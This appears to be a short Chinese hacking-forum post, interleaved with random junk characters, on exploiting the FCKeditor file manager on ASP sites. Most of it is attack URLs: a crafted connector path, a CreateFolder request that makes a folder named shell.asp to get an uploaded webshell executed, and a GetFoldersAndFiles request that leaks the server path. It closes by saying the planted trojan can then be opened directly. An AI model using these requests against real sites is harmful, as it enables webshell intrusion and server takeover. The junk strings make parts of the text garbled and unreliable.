网上流行着是上传是这样子的* T/ E5 S9 w/ h9 d6 [
! t4 z. Z% H4 J* X
http://localhost/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp, r7 l' O3 c# k( |3 [8 u% i7 b( i4 B
http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
5 w5 h; p0 `" K7 s: [% H+ y2 \! N6 y" g' a4 p1 G* H
上传后老找不到路径,测了一下,我发现
8 X* X* Z' A: ~6 H3 b+ q6 \8 @4 k: D, A0 I6 K
FCKeditor3/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/0 y; f# i3 Y4 D# X+ X
. n* X, R9 a% s3 y" }) y
可以爆出路径,显示以下内容
" C0 ^! u# y8 @# B: n( d" T- S% Q- z4 a3 N& Q; I3 @
; Q r* `! a) a9 F
得出路径,直接打开就见到马子
0 p" {2 p3 ]: P: Y6 K& h' W |